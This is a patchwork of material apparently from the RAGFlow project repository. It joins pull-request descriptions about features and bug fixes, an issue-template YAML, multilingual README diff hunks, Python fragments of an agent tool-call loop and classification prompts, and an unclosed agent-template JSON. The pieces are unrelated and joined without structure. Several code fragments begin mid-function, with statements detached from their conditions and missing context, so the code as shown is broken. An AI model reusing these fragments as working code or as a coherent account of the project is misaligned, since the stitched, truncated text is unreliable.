We have many departments (> 20 now and increasing), and each department
has its own knowledge base. Because the agent workflow is the same, I
want to change the knowledge base on the fly, instead of creating agents
for every department.
It now looks like this:

Knowledge bases can be selected from the dropdown, and passed through
the variables in the table. All selected knowledge bases are used for
retrieval.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7407
Based on this context, I think something causes some LLMs to have a
mismatch (the wrong "@xxx" is appended).
So when the LLM cannot be fetched using the fid, falling back to the
name alone should be able to fetch it.
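The fallback idea can be sketched as below. The `name@fid` reference format, the list-of-dicts model store and the function `find_llm` are assumptions made for illustration and are not the project's actual lookup code.

```python
from typing import Optional


def find_llm(models: list, model_ref: str) -> Optional[dict]:
    """Look up by (name, fid) first, then fall back to the name alone."""
    name, _, fid = model_ref.partition("@")
    if fid:
        for model in models:
            if model["name"] == name and model["fid"] == fid:
                return model
    # Fallback: the "@xxx" part was missing or did not match any factory.
    for model in models:
        if model["name"] == name:
            return model
    return None


models = [{"name": "qwen-max", "fid": "Tongyi-Qianwen"}]
print(find_llm(models, "qwen-max@WrongFactory"))
```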
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Remove unnecessary parameter restrictions in dataset creation API
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Deprecate get_dataset_id_and_document_id fixture, use add_document
instead
### Type of change
- [x] Update test cases
### What problem does this PR solve?
Feat: Using IconFont as an additional icon library #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When you remove any document from a knowledge base that uses a knowledge
graph, the graph's `removed_kwd` is set to "Y".
However, in the function `graphrag.utils.get_gaph`, the `rebuild_graph`
method is skipped and `None` is returned directly while `removed_kwd=Y`,
so the residual part of the graph is abandoned (but old entity data still
exists in the db).
Besides, the infinity instance actually skips deleting graph components'
`source_id` when removing a document. This may lead to a wrong graph
after rebuild.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify background color of Card #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Qwen3 and more LLMs.
Close #7296
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a language switch drop-down box to the top navigation bar
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the segmented component style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the create dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix the Redis lock always timing out (reorder the logic so that the lock
is released first)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the home page #3321
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Bind data to the agent module of the home page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for OAuth2 and OpenID Connect (OIDC) authentication,
allowing OAuth/OIDC authentication using the specified routes:
- `/login/<channel>`: Initiates the OAuth flow for the specified channel
- `/oauth/callback/<channel>`: Handles the OAuth callback after
successful authentication
The callback URL should be configured in your OAuth provider as:
```
https://your-app.com/oauth/callback/<channel>
```
For detailed instructions on configuring **service_conf.yaml.template**,
see: `./api/apps/auth/README.md#usage`.
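As a small illustration of the two routes above, the sketch below builds the login URL and the callback URL for a channel. The helper names and the `github` channel are hypothetical; only the route shapes come from this description.

```python
from urllib.parse import quote


def login_url(base_url: str, channel: str) -> str:
    """Build the URL that starts the OAuth flow for a channel."""
    return f"{base_url.rstrip('/')}/login/{quote(channel, safe='')}"


def oauth_callback_url(base_url: str, channel: str) -> str:
    """Build the redirect URI to register with the OAuth provider."""
    return f"{base_url.rstrip('/')}/oauth/callback/{quote(channel, safe='')}"


# "github" is only an example channel name.
print(login_url("https://your-app.com", "github"))
print(oauth_callback_url("https://your-app.com", "github"))
```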
- Related issues
#3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
When updating a chat assistant through the API, if the datasets attached to the
current chat assistant are not empty, setting the datasets to
empty (`"dataset_ids": []`) causes the update to fail with: 'dataset_ids' can't be
empty
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add AsyncTreeSelect component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, GraphRAG’s LOOP_PROMPT causes the model to keep appending
entities and relationships even after outputting “Y,” which wastes time.
Referring to the latest code in
[graphRAG](https://github.com/microsoft/graphrag/blob/main/graphrag/prompts/index/extract_graph.py),
I modified the LOOP_PROMPT, and after verification the updated prompt
reliably outputs “Y” and stops.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
After upgrading from 0.17.2 or on a new install, the 0.18.0 MCP server cannot start
unless everything in Docker is rebuilt
Close #7321
The MCP server cannot start automatically from Docker:
2025-04-25 17:30:44,512 INFO 25 task_executor_2a9f3e2de99a_0 reported
heartbeat: {"name": "task_executor_2a9f3e2de99a_0", "now":
"2025-04-25T17:30:44.509+08:00", "boot_at":
"2025-04-25T16:43:33.038+08:00", "pending": 0, "lag": 0, "done": 0,
"failed": 0, "current": {}}
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
Problem:
The start arguments passed to server.py in Docker are not correct, so the MCP server fails
to start.
Reason:
```
1. docker-compose.yaml
example - --mcp-host-api-key="ragflow-12345678" is wrong. Do not add "" around the key, or it reports: "api-key wrong"
2. The Docker entrypoint.sh cannot translate the config into the exec command, so we need to map the file from the host into the container
- ./entrypoint.sh:/ragflow/entrypoint.sh
3. Adding one line of code fixes all of the problems
```
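The quoting issue in point 1 can be reproduced without Docker. The sketch below assumes the option is parsed with `argparse` and that the argument arrives exactly as written in the YAML list item, with no shell in between to strip the quotes. The parser here is a stand-in, not the real server.py.

```python
import argparse

# Stand-in parser; only the flag name is taken from the description above.
parser = argparse.ArgumentParser()
parser.add_argument("--mcp-host-api-key")

# Without a shell to remove them, the double quotes stay inside the value.
quoted = parser.parse_args(['--mcp-host-api-key="ragflow-12345678"'])
plain = parser.parse_args(["--mcp-host-api-key=ragflow-12345678"])

print(repr(quoted.mcp_host_api_key))
print(repr(plain.mcp_host_api_key))
```

The first value keeps its surrounding double quotes, so it no longer matches the real key; the second is the bare key.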
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Performance Improvement
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
In the generate_confirmation_token method, a spelling error was found
with 'tenent_id'. The correct spelling should be 'tenant_id'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: shengliang xiao <shengliangxiao2024@gmail.com>
With the current config, you get the error "Fail to access model(gemma-7b-it)
using this api key",
since the model has been removed, according to the official Groq documentation:
https://console.groq.com/docs/models
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Batch operations on documents in a dataset #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhance capability of `list_docs`.
Breaking change: change method from `GET` to `POST`.
### Type of change
- [x] Refactoring
- [x] Enhancement with breaking change
### What problem does this PR solve?
Feat: Create empty document. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter document by running status and file type. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save document metadata #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6984
1. The Markdown parser supports extracting pictures
2. For Native, images are handled when processing Markdown
3. improve merge and
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Save the configuration information of the knowledge base document
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the document configuration dialog with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds support for the latest OpenSearch 2.19.1 as a storage engine
and search engine option for RAGFlow.
### Main Benefit
1. OpenSearch 2.19.1 is licensed under the [Apache v2.0 License], which is
much better than Elasticsearch's license
2. For search, OpenSearch 2.19.1 supports full-text
search, vector_search, and hybrid_search, which are similar to Elasticsearch
in schema
3. For storage, OpenSearch 2.19.1 stores text and vectors, which are quite
similar to Elasticsearch in schema
### Changes
- Support opensearch_python_connector. I made many adaptations since
the schema and API/methods differ between ES and OpenSearch in many
ways (knn_search in particular has a significant gap):
rag/utils/opensearch_coon.py
- Support static config adaptations by changing:
conf/service_conf.yaml, api/settings.py, rag/settings.py
- Support some store and search schema changes between OpenSearch and ES:
conf/os_mapping.json
- Support the OpenSearch Python SDK: pyproject.toml
- Support Docker config for OpenSearch 2.19.1:
docker/.env, docker/docker-compose-base.yml, docker/service_conf.yaml.template
### How to use
- ES keeps its priority as the default doc/search engine; I didn't change that.
OpenSearch is used only if DOC_ENGINE=${DOC_ENGINE:-opensearch} is set in
docker/.env.
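A minimal sketch of this selection logic, assuming the engine is read from a `DOC_ENGINE` environment variable with Elasticsearch as the fallback. The `pick_doc_engine` helper and the supported-engine set are illustrative, not the code in api/settings.py.

```python
import os

# Illustrative set; only these two engines are discussed in this PR.
SUPPORTED_ENGINES = {"elasticsearch", "opensearch"}


def pick_doc_engine(env=None) -> str:
    """Return the configured doc engine, defaulting to Elasticsearch."""
    env = os.environ if env is None else env
    engine = env.get("DOC_ENGINE", "elasticsearch").lower()
    if engine not in SUPPORTED_ENGINES:
        raise ValueError(f"Unsupported DOC_ENGINE: {engine}")
    return engine
```

Passing a plain dict instead of `os.environ` keeps the helper easy to test without touching the process environment.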
### Others
Our team tested many docs in our environment using OpenSearch as
the vector database, and it works very well.
All of the config for OpenSearch is necessary.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Delete and rename files in the knowledge base #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display document parsing status #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The lock is not released correctly when task_executor is abnormal
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Some models force thinking, resulting in the absence of the think tag in
the returned content
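One way to handle such output is to restore the missing opening tag before any downstream parsing. This is a sketch under the assumption that the model emits only the closing `</think>` tag; `normalize_think` is a hypothetical helper, not the function changed in this PR.

```python
def normalize_think(content: str) -> str:
    """Prepend a missing opening <think> tag when only the closing tag is present."""
    if "</think>" in content and "<think>" not in content:
        return "<think>" + content
    return content


print(normalize_think("reasoning steps</think>final answer"))
```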
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes, after we commit the code and open the PR, the CI pipeline fails
in the Ruff checks. By adding a pre-commit hook, we can identify this problem
early and avoid lost time.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [X] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix the entrypoint file from the docker container to solve #7249
Here is the important part from the logs:
```
docker logs -f ragflow-server
...
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
...
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR fixes an issue with the MCP server configuration in RAGFlow's
Docker deployment where:
1. Incorrect parameter naming (`--mcp--host-api-key` with double
hyphens) caused server startup failures
2. Port binding conflicts occurred due to unexposed MCP ports in Docker
3. Inconsistent host addressing between `0.0.0.0` and `127.0.0.1` led to
connectivity issues
The changes ensure proper MCP server initialization and reliable
inter-service communication.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Key Changes
1. **Parameter Correction**:
- Fixed `--mcp--host-api-key` → `--mcp-host-api-key`
### What problem does this PR solve?
Feat: Deleting files in batches. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
description: Propose an agent scenario request for RAGFlow.
title: "[Agent Scenario Request]: "
labels: ["❤️🔥ᴬᴳᴱᴺᵀ agent scenario"]
body:
  - type: checkboxes
    attributes:
      label: Self Checks
      description: "Please check the following in order to be responded in time :)"
      options:
        - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
          required: true
        - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
          required: true
        - label: Non-English title submissions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
          required: true
        - label: "Please do not modify this template :) and fill in all the required fields."
          required: true
  - type: textarea
    attributes:
      label: Is your feature request related to a scenario?
      description: |
        A clear and concise description of what the scenario is. Ex. I'm always frustrated when [...]
      render: Markdown
    validations:
      required: false
  - type: textarea
    attributes:
      label: Describe the feature you'd like
      description: A clear and concise description of what you want to happen.
    validations:
      required: true
  - type: textarea
    attributes:
      label: Documentation, adoption, use case
      description: If you can, explain some scenarios how users might use this, situations it would be helpful in. Any API designs, mockups, or diagrams are also helpful.
      render: Markdown
    validations:
      required: false
  - type: textarea
    attributes:
      label: Additional information
      description: |
        Add any other context or screenshots about the feature request here.
- 2025-08-08 Supports OpenAI's latest GPT-5 series models.
- 2025-08-04 Supports new models, including Kimi K2 and Grok 4.
- 2025-08-01 Supports agentic workflow and MCP.
- 2025-05-23 Adds a Python/JavaScript code executor component to Agent.
- 2025-05-05 Supports cross-language query.
- 2025-03-19 Supports using a multi-modal model to make sense of images within PDF or DOCX files.
- 2025-02-28 Combined with Internet search (Tavily), supports reasoning like Deep Research for any LLMs.
- 2025-01-26 Optimizes knowledge graph extraction and application, offering various configuration options.
- 2024-12-18 Upgrades Document Layout Analysis model in DeepDoc.
- 2024-11-01 Adds keyword extraction and related question generation to the parsed chunks to improve the accuracy of retrieval.
- 2024-08-22 Support text to SQL statements through RAG.
## 🎉 Stay Tuned
@ -137,8 +149,10 @@ releases! 🌟
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> If you have not installed Docker on your local machine (Windows, Mac, or Linux),
> see [Install Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Start up the server
@ -176,7 +190,7 @@ releases! 🌟
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.
> The command below downloads the `v0.18.0-slim` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.18.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0` for the full edition `v0.18.0`.
> The command below downloads the `v0.20.2-slim` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.20.2-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2` for the full edition `v0.20.2`.
```bash
$ cd ragflow/docker
@ -189,8 +203,8 @@ releases! 🌟
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
- 2025-08-08 Mendukung model seri GPT-5 terbaru dari OpenAI.
- 2025-08-04 Mendukung model baru, termasuk Kimi K2 dan Grok 4.
- 2025-08-01 Mendukung alur kerja agen dan MCP.
- 2025-05-23 Menambahkan komponen pelaksana kode Python/JS ke Agen.
- 2025-05-05 Mendukung kueri lintas bahasa.
- 2025-03-19 Mendukung penggunaan model multi-modal untuk memahami gambar di dalam file PDF atau DOCX.
- 2025-02-28 dikombinasikan dengan pencarian Internet (TAVILY), mendukung penelitian mendalam untuk LLM apa pun.
- 2025-01-26 Optimalkan ekstraksi dan penerapan grafik pengetahuan dan sediakan berbagai opsi konfigurasi.
- 2024-12-18 Meningkatkan model Analisis Tata Letak Dokumen di DeepDoc.
- 2024-11-01 Penambahan ekstraksi kata kunci dan pembuatan pertanyaan terkait untuk meningkatkan akurasi pengambilan.
- 2024-08-22 Dukungan untuk teks ke pernyataan SQL melalui RAG.
## 🎉 Tetap Terkini
@ -132,6 +140,10 @@ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Hanya diperlukan jika Anda ingin menggunakan fitur eksekutor kode (sandbox) dari RAGFlow.
> [!TIP]
> Jika Anda belum menginstal Docker di komputer lokal Anda (Windows, Mac, atau Linux), lihat [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Menjalankan Server
@ -169,7 +181,7 @@ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
> Semua gambar Docker dibangun untuk platform x86. Saat ini, kami tidak menawarkan gambar Docker untuk ARM64.
> Jika Anda menggunakan platform ARM64, [silakan gunakan panduan ini untuk membangun gambar Docker yang kompatibel dengan sistem Anda](https://ragflow.io/docs/dev/build_docker_image).
> Perintah di bawah ini mengunduh edisi v0.18.0-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.18.0-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0 untuk edisi lengkap v0.18.0.
> Perintah di bawah ini mengunduh edisi v0.20.2-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.20.2-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2 untuk edisi lengkap v0.20.2.
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
- 2025-05-23 Agent에 Python/JS 코드 실행기 구성 요소를 추가합니다.
- 2025-05-05 언어 간 쿼리를 지원합니다.
- 2025-03-19 PDF 또는 DOCX 파일 내의 이미지를 이해하기 위해 다중 모드 모델을 사용하는 것을 지원합니다.
- 2025-02-28 인터넷 검색(TAVILY)과 결합되어 모든 LLM에 대한 심층 연구를 지원합니다.
- 2025-01-26 지식 그래프 추출 및 적용을 최적화하고 다양한 구성 옵션을 제공합니다.
- 2024-12-18 DeepDoc의 문서 레이아웃 분석 모델 업그레이드.
- 2024-11-01 파싱된 청크에 키워드 추출 및 관련 질문 생성을 추가하여 재현율을 향상시킵니다.
- 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
## 🎉 계속 지켜봐 주세요
@ -112,6 +120,9 @@
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): RAGFlow의 코드 실행기(샌드박스) 기능을 사용하려는 경우에만 필요합니다.
> [!TIP]
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](https://docs.docker.com/engine/install/)를 참조하세요.
### 🚀 서버 시작하기
@ -149,7 +160,7 @@
> 모든 Docker 이미지는 x86 플랫폼을 위해 빌드되었습니다. 우리는 현재 ARM64 플랫폼을 위한 Docker 이미지를 제공하지 않습니다.
> ARM64 플랫폼을 사용 중이라면, [시스템과 호환되는 Docker 이미지를 빌드하려면 이 가이드를 사용해 주세요](https://ragflow.io/docs/dev/build_docker_image).
> 아래 명령어는 RAGFlow Docker 이미지의 v0.18.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.18.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.18.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0로 설정합니다.
> 아래 명령어는 RAGFlow Docker 이미지의 v0.20.2-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.20.2-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.20.2을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2로 설정합니다.
```bash
$ cd ragflow/docker
@ -162,8 +173,8 @@
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
- 08-08-2025 Suporta a mais recente série GPT-5 da OpenAI.
- 04-08-2025 Suporta novos modelos, incluindo Kimi K2 e Grok 4.
- 01-08-2025 Suporta fluxo de trabalho agente e MCP.
- 23-05-2025 Adicione o componente executor de código Python/JS ao Agente.
- 05-05-2025 Suporte a consultas entre idiomas.
- 19-03-2025 Suporta o uso de um modelo multi-modal para entender imagens dentro de arquivos PDF ou DOCX.
- 28-02-2025 combinado com a pesquisa na Internet (TAVILY), suporta pesquisas profundas para qualquer LLM.
- 26-01-2025 Otimize a extração e aplicação de gráficos de conhecimento e forneça uma variedade de opções de configuração.
- 18-12-2024 Atualiza o modelo de Análise de Layout de Documentos no DeepDoc.
- 01-11-2024 Adiciona extração de palavras-chave e geração de perguntas relacionadas aos blocos analisados para melhorar a precisão da recuperação.
- 22-08-2024 Suporta conversão de texto para comandos SQL via RAG.
## 🎉 Fique Ligado
@ -132,6 +140,9 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disco >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Necessário apenas se você pretende usar o recurso de executor de código (sandbox) do RAGFlow.
> [!TIP]
> Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Iniciar o servidor
@ -169,7 +180,7 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
> Todas as imagens Docker são construídas para plataformas x86. Atualmente, não oferecemos imagens Docker para ARM64.
> Se você estiver usando uma plataforma ARM64, por favor, utilize [este guia](https://ragflow.io/docs/dev/build_docker_image) para construir uma imagem Docker compatível com o seu sistema.
> O comando abaixo baixa a edição `v0.18.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.18.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0` para a edição completa `v0.18.0`.
> O comando abaixo baixa a edição `v0.20.2-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.20.2-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2` para a edição completa `v0.20.2`.
```bash
$ cd ragflow/docker
@ -182,8 +193,8 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
| Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável? |
# self.toolcall_session.get_tool_obj(name).add2system_prompt(f"The chat history with other agents are as following: \n" + self.get_useful_memory(user_request, str(args["user_prompt"])))
raise TypeError(f"List should be returned, but `{functions}`")
for f in functions:
    if not isinstance(f, dict):
        raise TypeError(f"An object type should be returned, but `{f}`")
with ThreadPoolExecutor(max_workers=5) as executor:
    thr = []
    for func in functions:
        name = func["name"]
        args = func["arguments"]
        if name == COMPLETE_TASK:
            append_user_content(hist, f"Respond with a formal answer. FORGET(DO NOT mention) about `{COMPLETE_TASK}`. The language for the response MUST be as the same as the first user request.\n")
logging.exception(msg=f"Wrong JSON argument format in LLM ReAct response: {e}")
e = f"\nTool call error, please correct the input parameter of response format and call it again.\n *** Exception ***\n{e}"
append_user_content(hist, str(e))
logging.warning(f"Exceed max rounds: {self._param.max_rounds}")
final_instruction = f"""
{user_request}
IMPORTANT: You have reached the conversation limit. Based on ALL the information and research you have gathered so far, please provide a DIRECT and COMPREHENSIVE final answer to the original request.
Instructions:
1. SYNTHESIZE all information collected during this conversation
2. Provide a COMPLETE response using existing data - do not suggest additional research
3. Structure your response as a FINAL DELIVERABLE, not a plan
4. If information is incomplete, state what you found and provide the best analysis possible with available data
5. DO NOT mention conversation limits or suggest further steps
6. Focus on delivering VALUE with the information already gathered
Respond immediately with your final comprehensive answer.
Task: You need to categorize the user’s questions into {} categories, namely: {}
self.sys_prompt = """
You are an advanced classification system that categorizes user questions into specific types. Analyze the input question and classify it into ONE of the following categories:
{}
Here's description of each category:
{}
- {}
You could learn from the following examples:
{}
You could learn from the above examples.
---- Instructions ----
- Consider both explicit mentions and implied context
- Prioritize the most specific applicable category
- Return only the category name without explanations
- Use "Other" only when no other category fits
Requirements:
- Just mention the category names, no need for any additional words.
return "⌛Give me a moment—starting from: \n\n" + re.sub(r"(User's query:|[\\]+)", '', msg[-1]['content'], flags=re.DOTALL) + "\n\nI’ll figure out our best next move."
"description":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI “writers”, where each agent plays a specialized role — just like a real editorial team.",
"canvas_type":"Agent",
"dsl":{
"components":{
"Agent:LuckyApplesGrab":{
"downstream":[
"Message:ModernSwansThrow"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
